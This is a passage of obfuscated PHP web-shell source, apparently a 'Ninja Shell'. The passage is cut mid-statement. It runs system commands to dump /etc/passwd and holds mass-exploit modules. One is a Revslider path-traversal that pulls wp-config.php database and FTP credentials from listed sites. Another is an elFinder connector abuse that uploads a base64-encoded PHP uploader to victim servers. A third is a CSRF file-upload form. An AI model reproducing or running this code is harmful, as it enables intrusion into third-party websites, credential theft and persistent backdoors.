"\x3c\x74\145\170\164\x61\x72\145\x61\x20\x63\154\141\x73\x73\x3d\47\x66\157\162\x6d\x2d\143\x6f\x6e\x74\162\157\154\47\x20\143\x6f\154\163\75\47\x36\x35\47\x20\x72\x6f\167\163\x3d\47\x31\x35\47\76"; echo exec("\143\141\x74\40\57\x65\x74\143\x2f\160\141\163\x73\167\144"); echo "\x3c\x2f\x74\145\x78\x74\141\162\x65\141\x3e\74\142\x72\76\x3c\x62\162\x3e\74\x62\x3e\74\57\x62\76\x3c\x62\162\76"; } if ($_POST["\163\150\x65\x78"]) { echo "\74\164\x65\170\164\141\x72\145\141\x20\x63\x6c\141\163\x73\75\x27\146\x6f\x72\155\x2d\x63\x6f\156\164\162\157\154\x27\x20\143\x6f\x6c\x73\75\x27\66\x35\47\40\x72\x6f\x77\163\x3d\x27\61\65\x27\76"; echo shell_exec("\143\141\x74\40\x2f\145\164\x63\57\x70\x61\163\163\167\x64"); echo "\74\x2f\164\145\x78\164\141\x72\x65\141\x3e\x3c\x62\x72\x3e\x3c\142\162\76\x3c\142\76\x3c\x2f\142\x3e\x3c\142\x72\x3e"; } echo "\74\x63\145\x6e\x74\x65\162\76"; if ($_POST["\155\145\154\145\170"]) { echo "\74\x74\x65\x78\x74\x61\162\145\x61\40\x63\154\141\163\163\x3d\x27\146\157\x72\155\x2d\x63\157\156\x74\162\157\x6c\x27\x20\x63\157\x6c\163\x3d\47\66\x35\x27\40\162\x6f\x77\x73\75\47\x31\65\x27\76"; for ($uid = 0; $uid < 60000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}\x3a"; } print "\12"; } } echo "\74\57\164\145\170\x74\x61\x72\145\x61\76\74\142\162\x3e\74\142\162\x3e"; } } elseif (isset($_GET[hex("\145\x78\x70\x6c\x6f\x69\x74\145\162")])) { echo "\74\x68\x72\76\74\142\162\76"; echo "\x3c\x63\145\156\164\x65\162\76\x3c\x68\62\x3e\x45\170\160\x6c\x6f\x69\164\x65\162\40\116\151\x6e\x6a\x61\x20\123\150\x65\x6c\154\x3c\57\x68\62\x3e\74\x2f\x63\145\x6e\164\x65\162\76\x3c\142\x72\76"; echo "\74\x66\x6f\162\155\40\155\145\164\x68\x6f\x64\x20\75\x20\47\x50\117\x53\124\47\76\xa\11\x9\x9\11\11\11\x3c\x64\151\166\x20\x63\x6c\x61\x73\163\x20\x3d\40\47\x72\157\167\x20\x63\x6c\x65\141\162\x66\x69\x78\x27\76\12\11\x9\x9\x9\x9\11\x3c\x64\x69\x76\40\143\x6c\141\163\x73\40\x3d\40\x27\x63\x6f\x6c\55\x6d\144\55\x33\47\x3e\xa\x9\x9\x9\11\11\x9\74\x61\40\x63\154\141\163\163\40\75\40\47\x66\157\162\x6d\x2d\143\x6f\156\164\x72\x6f\x6c\x20\x61\152\x78\x27\40\150\162\145\x66\x20\75\x20\47\77\x64\75" . hex($d) . "\x26" . hex("\143\x73\162\146") . "\47\x20\163\164\171\154\145\75\47\x77\151\144\x74\x68\72\40\x32\x35\60\x70\x78\x3b\x27\x20\x68\x65\151\147\150\x74\x3d\x27\x31\60\47\x3e\74\x63\x65\x6e\x74\x65\162\x3e\x43\x53\122\x46\x20\x45\x78\160\154\x6f\151\x74\145\162\x3c\57\x63\145\156\x74\x65\162\x3e\x3c\x2f\x61\76\12\11\x9\x9\x9\x9\11\x3c\x2f\x64\x69\166\x3e\xa\11\11\11\11\x9\x9\74\x64\x69\166\x20\143\154\x61\x73\x73\40\75\40\47\143\157\x6c\x2d\155\x64\x2d\x33\47\x3e\xa\x9\x9\11\x9\x9\x9\x3c\x61\40\143\154\x61\163\163\x20\75\40\47\x66\x6f\x72\x6d\x2d\143\x6f\156\x74\162\x6f\154\x20\141\x6a\170\x27\40\x68\162\145\146\40\75\40\x27\x3f\x64\75" . hex($d) . "\46" . hex("\162\145\166\x73\x6c\x69\x64\x65\x72") . "\x27\x20\163\164\x79\x6c\x65\75\47\x77\151\144\x74\150\x3a\40\x32\x35\x30\160\x78\x3b\x27\40\x68\145\x69\147\x68\x74\75\47\x31\60\47\x3e\74\x63\x65\156\164\x65\x72\x3e\122\145\x76\163\x6c\151\144\145\162\40\105\x78\160\x6c\x6f\151\x74\145\162\x3c\x2f\143\145\156\164\145\162\76\x3c\57\141\x3e\12\x9\11\x9\11\11\x9\74\57\x64\x69\x76\x3e\xa\11\x9\11\x9\11\11\x3c\144\151\x76\x20\x63\x6c\x61\163\163\40\x3d\40\47\143\157\x6c\x2d\155\144\x2d\63\47\76\xa\11\x9\x9\11\x9\x9\x3c\141\x20\x63\154\x61\x73\163\40\75\x20\47\x66\x6f\x72\x6d\x2d\143\x6f\x6e\x74\x72\157\x6c\x20\x61\x6a\170\47\x20\x68\x72\x65\x66\x20\x3d\x20\x27\x3f\x64\x3d" . hex($d) . "\46" . hex("\x65\154\146\x69\156\x64\x65\162") . "\47\40\163\164\x79\x6c\145\x3d\47\x77\151\x64\x74\x68\72\40\62\65\60\160\x78\x3b\47\40\150\x65\151\147\150\x74\x3d\47\x31\x30\47\76\x3c\143\x65\x6e\164\x65\162\x3e\105\154\x66\151\x6e\144\145\162\x20\105\170\x70\154\x6f\151\164\x65\x72\x3c\57\143\x65\156\164\x65\x72\x3e\74\57\141\76\12\x9\x9\x9\11\11\x9\x3c\57\144\x69\166\x3e\xa\x9\11\11\11\11\11\74\144\151\x76\x20\x63\154\x61\x73\163\40\75\40\x27\143\157\x6c\x2d\x6d\144\55\63\47\76\xa\x9\x9\11\x9\x9\x9\74\x61\40\x63\154\141\x73\163\x20\75\x20\47\146\157\162\x6d\x2d\143\157\x6e\x74\x72\x6f\154\40\x61\x6a\170\x27\x20\x68\162\145\146\x20\75\x20\x27\x3f\144\75" . hex($d) . "\46" . hex("\144\162\x75\160\141\154") . "\x27\40\163\164\x79\x6c\x65\75\x27\x77\151\x64\164\x68\x3a\x20\62\x35\60\x70\170\73\x27\x20\x68\x65\151\x67\x68\164\75\x27\61\x30\47\76\74\x63\145\x6e\x74\x65\162\x3e\104\162\x75\x70\x61\154\40\x45\x78\x70\154\157\x69\164\145\x72\x3c\x2f\143\145\156\164\145\162\x3e\x3c\x2f\x61\76\12\x9\11\x9\11\x9\11\x3c\x2f\144\151\166\x3e\xa\11\11\11\11\11\11\12\11\11\11\11\x9\11\74\x2f\x64\x69\x76\x3e\xa\x9\x9\11\x9\11\x9\12\x9\11\x9\x9\x9\11\74\57\x66\x6f\x72\155\76"; echo "\74\150\x72\x3e"; } elseif (isset($_GET[hex("\x63\x73\x72\x66")])) { echo "\12\74\150\162\76\74\x62\x72\76\x3c\143\x65\x6e\x74\145\x72\x3e\x3c\150\x32\x20\x73\x74\x79\154\145\75\x22\146\x6f\x6e\164\x2d\x73\x69\172\145\72\63\x33\160\x78\x3b\x22\76\103\x53\x52\x46\x20\105\170\160\x6c\157\151\x74\x65\x72\x20\116\x69\156\x6a\141\40\123\x68\145\x6c\154\74\57\150\x32\x3e\74\x62\162\76\x3c\x62\x72\76\xa\74\146\x6f\x6e\x74\x20\x73\151\172\x65\x3d\42\x33\x22\x3e\52\116\157\x74\145\40\72\40\x50\x6f\163\164\40\x46\x69\x6c\x65\x2c\x20\x54\x79\160\x65\x20\x3a\x20\x46\x69\x6c\x65\144\x61\x74\141\x20\x2f\40\144\x7a\x75\x70\x6c\x6f\141\x64\40\x2f\40\x64\x7a\x66\x69\x6c\x65\40\57\40\x64\172\x66\x69\x6c\x65\x73\40\x2f\40\146\151\x6c\145\40\x2f\40\141\152\x61\170\146\x75\x70\40\57\40\x66\151\154\145\x73\133\x5d\40\57\x20\161\161\x66\151\x6c\145\40\57\x20\x75\163\x65\x72\146\x69\x6c\145\x20\x2f\40\145\x74\143\x3c\57\x66\157\x6e\164\76\12\x3c\x62\x72\x3e\74\x62\x72\x3e\12\74\146\157\162\x6d\40\x6d\145\x74\150\157\144\75\x22\120\117\123\x54\42\40\x73\164\171\154\145\x3d\x22\146\x6f\x6e\164\x2d\x73\x69\172\x65\x3a\62\65\x70\170\73\42\40\x61\143\164\151\157\156\75\40\42\x22\x3e\xa\125\x52\x4c\x3a\x20\74\151\x6e\x70\165\x74\x20\x74\171\160\145\75\x22\164\x65\170\x74\42\x20\156\141\x6d\x65\x3d\42\x75\162\154\x22\40\163\151\x7a\x65\75\42\65\x30\42\x20\x68\x65\x69\x67\150\164\x3d\x22\x31\x30\42\x20\160\x6c\141\143\x65\150\157\154\x64\x65\162\x3d\x22\150\x74\164\160\72\x2f\x2f\167\167\167\x2e\x74\x61\x72\x67\145\x74\x2e\x63\x6f\155\57\160\x61\x74\150\57\x75\160\x6c\x6f\x61\144\56\160\x68\x70\x22\x20\163\x74\x79\x6c\145\x3d\42\x6d\141\x72\147\x69\x6e\72\40\x35\x70\x78\40\x61\165\164\x6f\73\x20\160\141\144\x64\x69\156\147\55\154\x65\x66\x74\x3a\40\x35\160\x78\x3b\40\167\x69\x64\x74\x68\x3a\x34\65\x30\x70\x78\73\x22\40\143\x6c\x61\163\163\40\x3d\x20\x22\x66\x6f\x72\x6d\55\143\x6f\x6e\164\x72\x6f\x6c\x22\x20\162\145\161\165\151\162\x65\144\x20\x61\165\x74\157\x63\157\x6d\160\x6c\145\x74\x65\x20\75\x20\x22\x6f\x66\x66\x22\76\74\142\162\x3e\xa\120\117\123\x54\x20\106\151\154\145\x3a\x20\x3c\x69\x6e\160\165\x74\40\x74\171\160\145\75\x22\x74\x65\x78\x74\x22\x20\156\x61\x6d\145\75\x22\x70\146\42\x20\163\151\172\x65\x3d\x22\x35\x30\42\x20\150\x65\x69\147\x68\x74\75\x22\61\x30\x22\40\x70\x6c\x61\x63\145\150\x6f\x6c\144\x65\162\75\42\x4c\x69\150\141\164\x20\x64\151\141\164\141\163\40\136\x22\x20\163\164\171\154\145\x3d\x22\x6d\141\162\x67\x69\156\x3a\40\65\160\x78\x20\x61\165\x74\x6f\x3b\40\160\141\x64\144\x69\156\x67\x2d\154\x65\146\164\72\40\65\x70\x78\73\40\x77\x69\x64\164\x68\72\x32\65\x30\x70\x78\x3b\42\40\x72\x65\x71\x75\x69\x72\x65\144\40\x63\x6c\x61\x73\163\x20\x3d\40\42\146\x6f\x72\155\x2d\x63\157\156\164\x72\157\154\42\40\x61\165\164\157\x63\157\155\160\154\x65\x74\145\40\x3d\x20\42\x6f\146\146\x22\x3e\74\142\x72\76\12\x3c\x69\156\160\165\x74\40\163\x74\x79\154\145\x3d\x22\x77\x69\x64\164\150\72\63\65\x30\x70\170\x3b\x22\40\x74\x79\160\x65\75\42\x73\x75\x62\x6d\x69\x74\x22\x20\156\141\x6d\145\x3d\42\x64\42\40\166\141\154\165\145\x3d\x22\114\x6f\x63\153\41\x22\x20\143\154\141\x73\163\x20\x3d\40\x22\x66\x6f\162\155\x2d\143\x6f\x6e\164\x72\x6f\x6c\x22\x3e\12\x3c\x2f\146\157\162\155\76\74\150\x72\76\x3c\142\162\x3e"; $url = $_POST["\165\x72\154"]; $pf = $_POST["\160\x66"]; $d = $_POST["\144"]; if ($d) { echo "\xa\11\x3c\x68\x32\x3e\125\x70\154\157\141\144\40\x59\157\165\x72\40\106\151\154\x65\x73\x3c\57\x68\x32\x3e\xa\11\x3c\146\157\x72\155\x20\155\x65\x74\150\x6f\144\75\47\160\157\x73\x74\47\40\164\141\162\x67\145\164\75\47\x5f\142\x6c\141\156\153\x27\40\x61\143\164\151\157\156\75\47{$url}\x27\40\x65\156\x63\164\171\160\145\75\x27\x6d\x75\x6c\x74\151\160\x61\x72\164\x2f\x66\157\162\155\55\x64\x61\164\141\47\x3e\74\151\156\x70\165\x74\40\164\x79\160\x65\x3d\x27\x66\151\x6c\x65\47\x20\156\141\155\x65\x3d\47{$pf}\x27\x3e\x3c\151\156\x70\x75\x74\40\x74\171\160\145\75\47\x73\165\142\155\151\164\x27\40\x6e\x61\155\145\x3d\47\x67\47\40\x76\141\154\165\145\x3d\x27\125\160\154\x6f\141\x64\x27\x3e\x3c\x2f\146\157\162\x6d\76"; } } elseif (isset($_GET[hex("\x72\145\x76\x73\154\x69\144\x65\x72")])) { echo "\xa\40\x20\40\x20\x20\xa\74\143\x65\x6e\x74\x65\x72\76\74\x68\162\x3e\74\142\162\76\12\x3c\x68\x32\76\x52\145\166\x73\x6c\x69\144\x65\x72\40\x45\170\x70\x6c\157\151\164\145\x72\x20\116\151\x6e\x6a\141\x20\x53\x68\x65\154\154\74\x2f\150\x32\76\12\x3c\x66\x6f\x72\155\x20\x6d\x65\x74\x68\157\x64\x3d\x27\x70\x6f\163\164\x27\x3e\xa\74\164\145\x78\x74\x61\162\x65\141\40\143\x6c\141\x73\163\x3d\47\146\157\x72\x6d\x2d\143\x6f\x6e\164\x72\x6f\x6c\x27\40\x6e\x61\x6d\x65\75\x27\x73\x69\164\x65\x27\40\143\x6f\x6c\163\75\47\x35\60\x27\x20\x72\x6f\x77\x73\x3d\47\61\62\x27\x3e\12\150\x74\164\x70\72\57\x2f\163\151\164\145\56\x63\x6f\x6d\12\150\x74\164\x70\x3a\x2f\x2f\163\x69\x74\145\62\x2e\x63\x6f\155\12\150\164\x74\160\72\57\57\x73\x69\x74\145\x33\56\143\x6f\x6d\74\57\x74\x65\170\164\141\x72\x65\x61\76\x3c\x62\x72\x3e\12\74\x69\x6e\x70\x75\x74\40\x63\154\141\x73\x73\x3d\47\x66\157\162\x6d\55\143\157\156\x74\162\157\x6c\x27\40\164\x79\160\145\75\47\x73\x75\x62\x6d\151\x74\47\x20\x73\164\171\154\145\x3d\47\x77\x69\x64\164\150\x3a\x20\x31\x35\60\x70\x78\x3b\x27\x20\156\x61\155\x65\75\47\163\x69\153\x61\x74\47\x20\x76\x61\x6c\x75\x65\75\x27\x47\x61\x73\x73\x21\47\x3e\12\x3c\x2f\x66\157\x72\155\x3e\74\x2f\x63\145\156\164\x65\162\76\x3c\x68\x72\x3e\x3c\142\x72\76\12"; function findit($mytext, $starttag, $endtag) { $posLeft = stripos($mytext, $starttag) + strlen($starttag); $posRight = stripos($mytext, $endtag, $posLeft + 1); return substr($mytext, $posLeft, $posRight - $posLeft); } error_reporting(0); set_time_limit(0); $ya = $_POST["\x73\x69\153\x61\x74"]; $co = $_POST["\163\151\x74\x65"]; if ($ya) { $e = explode("\xa", $co); foreach ($e as $bda) { $linkof = "\x2f\167\160\x2d\141\144\x6d\x69\x6e\57\141\144\x6d\x69\x6e\x2d\x61\152\141\x78\x2e\x70\150\x70\77\x61\x63\x74\151\x6f\156\x3d\162\x65\166\163\x6c\x69\x64\145\x72\x5f\163\x68\x6f\x77\137\x69\x6d\x61\147\145\x26\x69\x6d\x67\75\x2e\x2e\x2f\x77\160\x2d\143\x6f\156\x66\x69\x67\x2e\160\150\160"; $dn = $bda . $linkof; $file = @file_get_contents($dn); if (eregi("\x44\x42\137\x48\x4f\123\124", $file) and !eregi("\x46\x54\x50\x5f\x55\123\105\x52", $file)) { echo "\x3c\143\145\156\x74\x65\162\76\74\146\x6f\156\x74\x20\x66\x61\x63\x65\x3d\x22\143\x6f\x75\162\x69\145\162\42\x20\x63\157\x6c\x6f\162\75\167\150\x69\164\x65\x20\76\x2d\x2d\55\x2d\55\55\55\55\55\x2d\55\x2d\55\55\55\55\x2d\55\x2d\55\x2d\x2d\x2d\x2d\55\55\55\55\55\x2d\55\55\x2d\x2d\55\x2d\55\x2d\x2d\x2d\x2d\x2d\55\55\55\x2d\x3c\57\x66\x6f\156\164\76\74\57\143\145\x6e\164\x65\x72\76"; echo "\74\x63\x65\x6e\x74\x65\x72\76\74\146\157\x6e\164\40\x66\141\143\145\x3d\x27\143\157\x75\162\x69\145\x72\47\x20\143\157\154\157\162\75\47\154\151\155\145\x27\40\76" . $bda . "\74\57\x66\x6f\156\164\76\x3c\57\x63\145\156\164\145\162\76"; echo "\74\146\x6f\156\164\40\146\x61\x63\x65\x3d\47\x63\157\x75\x72\151\145\162\x27\40\x63\157\154\x6f\x72\x3d\154\x69\155\x65\x20\76\104\102\x20\x6e\x61\155\145\40\72\40\x3c\x2f\x66\157\x6e\x74\76" . findit($file, "\104\102\137\116\101\x4d\x45\47\x2c\40\47", "\x27\51\x3b") . "\74\x62\162\76"; echo "\74\x66\x6f\x6e\x74\40\x66\x61\x63\x65\x3d\x27\143\157\x75\x72\151\145\162\x27\40\x63\x6f\154\157\x72\75\x6c\x69\x6d\145\40\x3e\x44\102\x20\165\x73\145\x72\x20\x3a\x20\x3c\x2f\146\157\x6e\x74\x3e" . findit($file, "\104\x42\x5f\x55\x53\x45\x52\47\54\40\47", "\47\x29\x3b") . "\74\x62\162\x3e"; echo "\x3c\146\157\x6e\x74\40\x66\141\143\x65\75\x27\143\x6f\x75\162\151\145\162\x27\40\x63\x6f\154\x6f\x72\x3d\x6c\151\155\x65\x20\x3e\104\x42\x20\160\141\163\x73\x20\72\40\x3c\x2f\146\157\x6e\164\x3e" . findit($file, "\104\102\x5f\120\101\123\x53\x57\x4f\122\104\47\54\40\x27", "\x27\x29\73") . "\x3c\142\162\x3e"; echo "\74\146\157\156\x74\x20\x66\141\143\145\x3d\47\143\157\x75\x72\x69\145\162\47\x20\x63\157\154\157\x72\75\x6c\151\155\145\40\x3e\x44\102\40\150\x6f\163\164\40\72\x20\x3c\57\146\x6f\x6e\x74\x3e" . findit($file, "\104\102\x5f\110\117\123\x54\x27\54\40\x27", "\47\x29\x3b") . "\x3c\x62\162\x3e"; } elseif (eregi("\104\x42\137\x48\x4f\x53\x54", $file) and eregi("\106\124\x50\x5f\125\123\x45\x52", $file)) { echo "\74\143\145\x6e\x74\x65\162\76\x3c\x66\x6f\156\164\x20\146\x61\x63\x65\x3d\x22\x63\157\165\x72\151\x65\162\x22\40\143\x6f\x6c\x6f\x72\75\x77\x68\x69\x74\x65\x20\x3e\x2d\x2d\55\x2d\55\x2d\55\x2d\x2d\x2d\x2d\55\x2d\55\55\55\55\55\55\55\55\x2d\55\55\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\55\x2d\55\x2d\55\55\55\55\x2d\x2d\55\x2d\x2d\x2d\x3c\x2f\x66\157\x6e\x74\x3e\74\x2f\143\145\156\164\x65\x72\x3e"; echo "\74\143\x65\156\x74\x65\162\x3e\x3c\x66\157\156\164\40\x66\x61\143\x65\x3d\x27\x63\x6f\x75\x72\x69\x65\x72\47\x20\x63\x6f\154\157\162\75\x27\x6c\151\155\145\x27\x20\76" . $bda . "\74\x2f\146\157\156\x74\76\x3c\x2f\143\x65\x6e\x74\x65\x72\x3e"; echo "\x3c\146\157\156\164\x20\x66\x61\143\x65\x3d\x27\143\x6f\x75\x72\x69\x65\x72\x27\40\143\157\x6c\157\x72\75\x6c\151\x6d\145\x20\76\x46\124\120\40\x75\163\x65\x72\40\72\40\74\x2f\146\157\x6e\x74\x3e" . findit($file, "\x46\x54\x50\137\125\123\105\122\x27\54\47", "\x27\x29\73") . "\x3c\x62\x72\76"; echo "\74\x66\x6f\156\x74\x20\x66\x61\143\145\x3d\x27\143\157\x75\162\x69\145\162\47\40\143\x6f\154\157\x72\x3d\154\x69\155\145\x20\76\x46\124\120\40\160\x61\163\x73\x20\x3a\x20\74\x2f\146\157\156\164\x3e" . findit($file, "\x46\x54\120\137\x50\x41\123\123\47\x2c\x27", "\x27\51\73") . "\x3c\142\162\76"; echo "\x3c\x66\157\x6e\x74\x20\146\x61\x63\145\x3d\47\143\157\165\162\x69\145\x72\x27\40\143\157\x6c\x6f\x72\x3d\x6c\151\155\x65\x20\x3e\x46\x54\x50\40\x68\x6f\163\164\x20\x3a\x20\x3c\x2f\x66\x6f\156\164\76" . findit($file, "\x46\124\120\x5f\x48\117\x53\124\x27\54\47", "\x27\x29\x3b") . "\74\142\x72\x3e"; } else { echo "\74\x63\145\156\x74\145\162\x3e\x3c\x66\x6f\x6e\x74\x20\x66\141\143\145\x3d\47\143\x6f\x75\162\x69\145\x72\47\40\x63\157\154\157\x72\75\x27\162\145\x64\47\40\x3e" . $bda . "\x20\x2d\55\x2d\55\x3e\40\x6e\x6f\164\x20\x69\x6e\146\x65\143\164\145\x64\x20\x3c\x2f\x66\157\156\164\x3e\74\x2f\143\145\156\164\145\x72\x3e"; } echo "\74\143\x65\x6e\x74\145\162\76\74\146\x6f\156\164\x20\146\141\x63\145\75\42\143\157\x75\x72\x69\x65\x72\42\x20\143\157\x6c\157\x72\x3d\x77\150\x69\x74\x65\x20\76\55\55\55\55\55\55\x2d\x2d\x2d\x2d\x2d\x2d\55\55\55\55\x2d\x2d\x2d\x2d\55\x2d\55\x2d\55\55\55\x2d\x2d\55\x2d\55\x2d\55\55\x2d\x2d\x2d\55\x2d\55\55\55\x2d\55\55\x3c\x2f\146\x6f\156\164\x3e\x3c\57\143\x65\x6e\164\145\x72\x3e"; } } } elseif (isset($_GET[hex("\145\x6c\x66\x69\x6e\144\145\x72")])) { echo "\74\x68\162\76\x3c\x62\162\x3e"; echo "\74\x63\x65\156\x74\x65\x72\76"; echo "\x3c\150\x32\x3e\105\x6c\x46\x69\x6e\x64\x65\x72\x20\115\x61\x73\163\40\105\170\x70\154\x6f\x69\164\x65\x72\74\57\150\62\76"; echo "\x3c\146\x6f\x72\155\40\155\145\164\150\157\144\x3d\x22\160\157\163\164\42\x3e\xa\x54\x61\162\147\x65\164\72\40\x3c\x62\x72\x3e\xa\x3c\164\x65\x78\x74\x61\x72\145\x61\x20\x63\x6c\x61\x73\x73\x20\x3d\40\x22\x66\157\162\x6d\55\x63\x6f\x6e\164\x72\x6f\x6c\x22\x20\156\x61\155\145\75\x22\164\x61\x72\147\145\x74\x22\x20\160\154\141\x63\x65\x68\x6f\x6c\144\145\x72\x3d\x22\150\164\164\160\72\57\x2f\x77\x77\167\x2e\x74\x61\x72\x67\145\164\x2e\x63\157\155\57\145\154\x46\151\x6e\x64\x65\x72\x2f\160\150\x70\57\143\x6f\156\x6e\145\143\164\x6f\x72\56\160\150\x70\x22\40\x73\x74\171\154\x65\x3d\x22\x77\151\x64\x74\150\x3a\40\x36\x30\60\160\x78\73\x20\150\145\151\x67\x68\164\x3a\x20\62\65\60\160\170\73\x20\x6d\141\x72\x67\151\156\x3a\40\65\x70\170\x20\x61\165\164\157\73\40\162\x65\x73\x69\x7a\145\72\xa\x6e\x6f\156\145\x3b\42\x3e\74\57\x74\145\170\x74\x61\x72\145\141\x3e\74\142\x72\76\12\74\151\x6e\x70\x75\164\40\x63\154\x61\x73\x73\40\x3d\40\42\146\x6f\162\155\55\x63\157\156\164\x72\x6f\154\x22\40\164\x79\160\x65\x3d\x22\163\165\142\155\x69\164\x22\x20\156\x61\x6d\x65\x3d\x22\x78\x22\x20\x73\164\171\154\x65\75\42\167\151\x64\x74\150\72\40\x31\65\x30\160\x78\73\x20\150\x65\x69\147\150\164\x3a\40\x33\x35\x70\170\73\x20\x6d\x61\x72\x67\x69\x6e\72\x20\x35\160\170\x3b\x22\x20\x76\x61\154\x75\145\75\x22\123\111\113\101\124\x21\42\76\12\x3c\x2f\146\x6f\x72\x6d\x3e\x3c\x2f\143\x65\156\164\145\162\x3e\74\150\x72\x3e\x3c\x62\162\x3e"; function ngirim($url, $isi) { $ch = curl_init("{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\157\172\x69\154\x6c\141\57\x35\x2e\x30\40\50\x57\151\x6e\144\157\x77\x73\x20\x4e\x54\40\x36\x2e\61\73\x20\x72\x76\72\x33\x32\x2e\x30\x29\40\107\x65\x63\x6b\157\57\62\x30\61\60\60\x31\x30\61\x20\x46\151\162\145\146\157\170\57\x33\62\x2e\60"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $isi); curl_setopt($ch, CURLOPT_COOKIEJAR, "\143\x6f\153\x65\162\137\x6c\157\x67"); curl_setopt($ch, CURLOPT_COOKIEFILE, "\x63\x6f\x6b\145\x72\137\x6c\157\147"); $data3 = curl_exec($ch); return $data3; } $target = explode("\xa", $_POST["\x74\141\162\x67\145\x74"]); if ($_POST["\170"]) { foreach ($target as $korban) { $nama_doang = "\x45\170\157\162\143\151\x73\x6d\61\x33\x33\x37\x2e\160\150\x70"; $isi_nama_doang = "\x50\x44\71\x77\x61\110\x41\147\x43\155\x6c\155\113\x43\x52\146\125\x45\x39\x54\126\103\x6c\67\x43\155\154\155\113\105\102\152\142\x33\x42\65\x4b\103\x52\146\122\x6b\154\115\x52\x56\x4e\142\111\155\131\x69\x58\126\163\151\144\107\61\167\x58\62\x35\x68\x62\127\x55\x69\130\123\167\153\x58\x30\x5a\112\x54\x45\126\x54\127\x79\x4a\x6d\x49\x6c\61\x62\111\155\x35\x68\142\127\x55\151\130\123\x6b\x70\x65\x77\160\x6c\131\x32\150\x76\111\152\x78\x69\x50\x6d\x4a\154\143\155\150\x68\143\62\x6c\163\120\x43\71\x69\120\151\60\x74\120\151\111\165\112\106\x39\x47\x53\125\170\106\125\61\x73\151\132\151\x4a\144\x57\x79\x4a\165\131\x57\x31\xa\154\x49\154\x30\x37\x43\x6e\x31\x6c\142\110\x4e\154\145\167\160\154\131\x32\x68\x76\x49\x6a\x78\151\120\155\144\x68\x5a\x32\106\163\111\x6a\163\113\146\x51\160\x39\x43\x6d\126\x73\x63\62\126\x37\103\x67\x6c\154\x59\x32\150\166\x49\103\111\x38\132\x6d\x39\171\142\x53\102\164\132\130\x52\x6f\142\62\121\x39\143\x47\x39\172\x64\103\102\154\142\155\116\x30\x65\x58\x42\x6c\120\127\61\x31\142\110\122\160\x63\x47\106\171\144\103\x39\x6d\142\63\x4a\x74\114\127\122\x68\x64\107\x45\53\120\x47\x6c\165\143\110\126\x30\x49\110\122\65\143\107\x55\x39\132\x6d\x6c\163\132\123\x42\x75\x59\127\61\154\x50\x57\x59\x2b\x50\107\154\165\x63\x48\x56\xa\60\111\x47\x35\150\x62\x57\125\x39\x64\151\x42\60\x65\x58\x42\x6c\120\130\x4e\x31\131\x6d\61\160\x64\103\102\x70\132\104\61\62\x49\110\x5a\150\x62\110\126\x6c\120\130\126\167\120\152\170\x69\x63\152\x34\x69\x4f\x77\160\71\x43\x67\x6f\x2f\x50\x67\75\x3d"; $decode_isi = base64_decode($isi_nama_doang); $encode = base64_encode($nama_doang); $fp = fopen($nama_doang, "\167"); fputs($fp, $decode_isi); echo "\133\x21\135\x20\74\141\40\x68\162\x65\146\x3d\x27{$korban}\47\x20\164\141\162\147\x65\x74\x3d\x27\x5f\142\x6c\x61\x6e\x6b\x27\x3e{$korban}\74\57\x61\x3e\40\x3c\x62\162\76"; echo "\43\x20\x55\160\x6c\x6f\x61\x64\133\x31\x5d\40\56\x2e\x2e\56\56\56\74\x62\x72\x3e"; $url_mkfile = "{$korban}\x3f\x63\155\144\75\155\153\146\x69\x6c\145\x26\x6e\141\155\145\x3d{$nama_doang}\x26\x74\141\162\x67\x65\164\75\x6c\x31\x5f\x4c\x77"; $b = file_get_contents("{$url_mkfile}"); $post1 = array("\x63\x6d\144" => "\160\165\x74", "\164\x61\162\147\145\x74" => "\x6c\61\x5f{$encode}", "\143\x6f\156\x74\x65\156\164" => "{$decode_isi}"); $post2 = array("\143\x75\162\162\x65\x6e\x74" => "\x38\145\141\70\x38\x35\63\x63\x62\x39\63\146\62\146\71\x37\70\x31\145\x30\142\x66\66\x65\x38\x35\x37\60\61\x35\145\141", "\x75\x70\154\x6f\141\x64\133\x5d" => "\100{$nama_doang}"); $output_mkfile = ngirim("{$korban}", $post1); if (preg_match("\x2f{$nama_doang}\57", $output_mkfile)) { echo "\74\146\x6f\156\x74\40\x63\157\x6c\157\x72\x3d\x27\x6c\x69\155\x65\x27\76\43\x20\125\160\154\157\x61\144\x20\x53\165\153\163\x65\163\x20\61\56\x2e\x2e\40\x3d\76\x20{$nama_doang}\x3c\142\x72\76\43\x20\x43\157\x62\141\40\x62\165\153\x61\x20\x64\151\x20\x2e\x2e\57\x2e\56\x2f\145\154\x66\151\156\x64\145\x72\x2f\146\x69\154\145\x73\x2f\56\56\56\74\57\x66\x6f\156\x74\76\74\142\162\76\x3c\142\162\x3e"; } else { echo "\x3c\x66\157\x6e\x74\40\143\x6f\x6c\157\x72\x3d\x27\x72\x65\x64\47\76\x23\40\x55\160\x6c\x6f\x61\144\40\107\141\147\x61\x6c\x20\x43\157\153\x21\x20\61\x20\74\x62\162\76\43\x20\x55\160\154\157\141\144\151\156\x67\x20\x32\x2e\x2e\x3c\x2f\146\x6f\x6e\164\76\x3c\x62\x72\76"; $upload_ah = ngirim("{$korban}\x3f\143\x6d\144\75\x75\160\x6c\157\141\144", $post2); if (preg_match("\x2f{$nama_doang}\57", $upload_ah)) { echo "\x3c\146\157\x6e\x74\x20\x63\157\x6c\157\x72\75\47\x6c\x69\x6d\x65\47\x3e\43\40\x55\160\x6c\157\x61\x64\40\x53\x75\153\163\x65\x73\40\62\x20\x3d\76\40{$nama_doang}\x3c\x62\x72\76\x23\40\103\x6f\x62\141\x20\x62\x75\153\141\40\144\151\40\x2e\x2e\x2f\x2e\56\x2f\x65\154\x66\151\156\144\x65\162\x2f\146\151\154\145\163\57\56\x2e\x2e\74\57\x66\157\156\x74\x3e\x3c\x62\162\x3e\74\142\162\76"; } else { echo 